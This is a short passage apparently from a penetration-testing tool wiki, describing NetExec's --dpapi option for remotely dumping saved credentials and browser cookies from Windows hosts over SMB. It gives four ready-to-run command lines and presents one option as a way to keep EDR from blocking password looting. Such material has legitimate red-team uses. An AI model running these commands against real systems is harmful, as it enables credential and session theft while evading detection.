With NetExec
You can dump DPAPI credentials using NetExec using the following option: --dpapi. It will get all secrets from Credential Manager, Chrome, Edge, Firefox. --dpapi supports the following options :
cookies : Collect every cookies in browsers
nosystem : Won't collect system credentials. This will prevent EDR from stopping you from looting passwords 🔥
netexec smb <ip> -u user -p password --dpapi
netexec smb <ip> -u user -p password --dpapi cookies
netexec smb <ip> -u user -p password --dpapi nosystem
netexec smb <ip> -u user -p password --local-auth --dpapi nosystemLast updated